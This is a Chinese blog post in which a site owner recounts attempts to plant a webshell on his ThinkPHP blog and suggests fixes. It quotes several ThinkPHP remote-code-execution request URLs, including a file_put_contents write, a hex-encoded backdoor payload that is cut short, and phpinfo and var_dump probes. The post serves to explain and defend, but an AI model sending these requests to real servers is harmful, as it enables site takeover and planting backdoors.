网站SEO优化教程|技术分享|源码分享

本博客文章均是作者原创,记录码砖的点点滴滴,不介意搬砖,希望大家转载注明出处,感谢ing……




使用开源程序需谨慎,谨防不法分子利用各种漏洞写入木马提权


 2020-05-22 14:24:21  浏览量:(99)   标签: thinkphp被黑  thinkphp提权 




今天打开网站后台,竟然提示有人想利用远程执行漏洞在我的博客写入一句话木马???

那就不得不说开源程序的弊端了,由于开源,程序所有源码都暴露在公众的眼前,大家都知道,没有最完善的程序,所以有了源代码作为参考物,找漏洞更易如反掌

今天就给大家介绍下,别人怎么黑我的博客,语法如下:

http://www.4asport.com/index.php?a=fetch&templateFile=public/index&prefix=%27%27&content=file_put_contents(%27kfosx.php%27,%27OK%27)

利用Thinkphp的system函数远程命令执行file_put_contents创建'kfosx.php'并写入数据'OK'

http://www.4asport.com/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=kfosx.php&vars[1][1]=%3C%3F%70%68%70%0D%0A%63%6C%61%73%73%20%4E%58%4C%44%7B%0D%0A%20%20%20%20%66%75%6E%63%74%69%6F%6

再次执行漏洞写入后门

http://www.4asport.com/index.php?s=Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=var_dump&vars[1][]=a1b2c3d4e5

利用system函数远程命令执行

/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

怎么修复?

看语法,禁用file_put_contents、修复漏洞函数call_user_func_array、PHP禁用phpinfo()

防御方法:封禁所有敏感函数和端口,写程序拦截所有get、post过滤请求并记录,要不然被人黑了你都不知道咋回事,有能力的写一个拦截到可疑数据就发警告邮件给自己,这样就能及时应对喽!!!

程序员编程就和功夫一样,要学咏春以点位面,不能学抖音上的马大师花架子太多,3秒被KO

总之一句话,开源程序少用为妙,多学习编程,自己写一套博客也花不了多少功夫,还有一句话:功能越多越复杂,相对的漏洞也就更多。



如文章内容失效请联系作者更新,感谢ing,如有任何疑问点击网站提问按钮;

本文由【日韩赶SEO】原创,转载请注明出处,违者必究:http://4asport.com/post/81.html

提问 刷新 ^

友情链接:A5源码

Copyright ?2019 【日韩赶SEO】京ICP备25252500号